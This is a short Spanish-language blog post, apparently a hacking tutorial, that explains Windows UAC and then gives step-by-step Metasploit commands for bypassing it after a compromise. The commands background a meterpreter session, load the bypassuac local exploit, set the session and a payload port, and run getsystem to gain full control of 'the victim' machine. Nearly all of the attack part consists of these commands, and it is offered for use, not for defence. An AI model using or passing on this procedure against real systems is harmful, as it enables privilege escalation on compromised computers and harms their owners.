¿Qué es UAC de Windows?. Es un
sistema de seguridad que tiene Windows, desde Windows 7. Cada vez que
instalamos un programa, es la ventanita que nos aparece que si
queremos permitir que el mismo programa haga cambios en el equipo.
En este post, vamos a aprender a
saltárnoslo, eso sí. No funcionará si la víctima tiene un AV.
Una vez hecha la intrusión, cuando
intentamos el comando
meterpreter>getsystem
No nos deja.
background
use exploit/windows/local/bypassuac
En la opción SESSION tendremos que
poner el número de sesión de meterpreter, en mi caso, la 1, por lo
que pongo:
set SESSION 1
En este exploit, también se ejecutará
un payload. Para ello debemos configurar el puerto:
set PORT 6666
exploit
Os dará una nueva sesión de
meterpreter (en la cual, os introducirá inmediatamente). Y es,
dentro de la misma, en la que podréis tener a todo el acceso con:
getsystem.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.